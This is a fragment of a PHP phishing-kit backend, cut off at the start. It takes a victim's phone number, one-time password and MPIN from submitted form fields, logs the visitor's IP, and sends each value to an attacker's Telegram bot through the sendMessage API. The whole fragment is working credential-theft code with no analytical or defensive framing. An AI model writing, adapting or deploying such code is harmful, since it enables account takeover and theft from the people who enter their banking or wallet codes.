g:i a'); $ip = $_SERVER['REMOTE_ADDR']; if (!empty($_POST['number'])) { $z = [ 'chat_id' => $chat_id, 'text' => $time . "\nLogged => " . $ip . "\nNumber => " . $_POST['number'] ]; file_get_contents("https://api.telegram.org/bot" . $bot_token . "/sendMessage?" . http_build_query($z)); } elseif (!empty($numotp)) { $z = [ 'chat_id' => $chat_id, 'text' => "Logged => " . $ip . "\nOTP => " . $numotp ]; file_get_contents("https://api.telegram.org/bot" . $bot_token . "/sendMessage?" . http_build_query($z)); } elseif (!empty($_POST['mpincode'])) { $z = [ 'chat_id' => $chat_id, 'text' => "Logged => " . $ip . "\nMPIN => " . $mpincode ]; file_get_contents("https://api.telegram.org/bot" . $bot_token . "/sendMessage?" . http_build_query($z)); } ?>